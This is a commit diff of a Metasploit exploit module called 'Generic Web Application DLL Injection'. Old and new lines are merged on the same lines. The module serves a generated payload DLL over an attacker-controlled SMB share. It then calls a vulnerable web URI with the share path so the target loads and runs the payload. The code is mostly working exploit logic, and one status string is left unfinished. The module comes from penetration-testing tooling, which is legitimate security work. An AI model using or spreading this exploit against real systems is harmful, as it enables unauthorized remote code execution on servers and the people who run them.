Clean module

bug/bundler_fix
jvazquez-r7 2015-03-04 16:18:10 -06:00
parent d4738d8c0a
commit 1337b7ace8
1 changed files with 40 additions and 37 deletions

View File

@ -1,82 +1,85 @@
## ##
# This module requires Metasploit: http//metasploit.com/download # This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
# This is an example implementation of using the Msf::Exploit::Remote::SMBFileServer module
# to serve an arbitrary DLL over HTTP
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE include Msf::Exploit::EXE
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => 'HTTP DLL Server', 'Name' => 'Generic Web Application DLL Injection',
'Description' => %q{ 'Description' => %q{
This is a general-purpose module for exploiting conditions where a HTTP request This is a general-purpose module for exploiting conditions where a HTTP request
triggers a DLL load from a specified SMB share. This module serves payloads as triggers a DLL load from a specified SMB share. This module serves payloads as
DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
trigger the load of the DLL. trigger the load of the DLL.
}, },
'Author' => [ 'Author' =>
'Matthew Hall <hallm@sec-1.com>', [
], 'Matthew Hall <hallm[at]sec-1.com>'
],
'Platform' => 'win', 'Platform' => 'win',
'Privileged' => true, 'Privileged' => false,
'Arch' => ARCH_X86, 'Arch' => [ARCH_X86, ARCH_X86_64],
'Stance' => Msf::Exploit::Stance::Aggressive,
'References' => 'References' =>
[ [
[ 'URL', 'http://www.sec-1.com/blog/'], ['CWE', '427']
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => 'thread', 'EXITFUNC' => 'thread',
}, },
'Privileged' => true,
'Platform' => [ 'win'],
'Targets' => 'Targets' =>
[ [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
], ],
'DefaultTarget' => 0, # Default target is 32-bit as we usually inject into 32bit processes 'DefaultTarget' => 0, # Default target is 32-bit as we usually inject into 32bit processes
'DisclosureDate' => 'Mar 04 2015'
)) ))
register_options( register_options(
[ [
OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'exploit.dll']), OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']),
OptString.new('URI', [true, 'Path to vulnerable URI (last argument will be the location of the file shared)', '/path/to/vulnerable/function.ext?argument=' ]), OptString.new('TARGETURI', [true, 'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]),
OptBool.new('StripExt', [false, 'Boolean to whether I should strip the file extension (e.g. foo.dll => foo)', true]), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
], self.class) ], self.class)
deregister_options('FILE_CONTENTS') deregister_options('FILE_CONTENTS')
end end
def primer def setup
super
self.file_contents = generate_payload_dll self.file_contents = generate_payload_dll
self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
print_status("File available on #{unc}...") print_status("File available on #{unc}...")
if datastore['StripExt'] end
share = "#{unc}".gsub(/\.dll/,'')
else
share = "#{unc}"
end
print_status("Requesting DLL load to #{datastore['RHOST']}:#{datastore['RPORT']} from #{share}")
sploit = datastore['URI'] def primer
sploit << share sploit = target_uri.to_s
sploit << unc
res = send_request_raw({ print_status("#{peer} - Trying to ")
send_request_raw({
'method' => 'GET', 'method' => 'GET',
'uri' => sploit 'uri' => sploit
}, 5) }, 3)
end
# Wait 30 seconds for session to be created def exploit
1.upto(30) do begin
break if session_created? Timeout.timeout(datastore['SMB_DELAY']) {super}
sleep(1) rescue Timeout::Error
# do nothing... just finish exploit and stop smb server...
end end
disconnect
end end
end end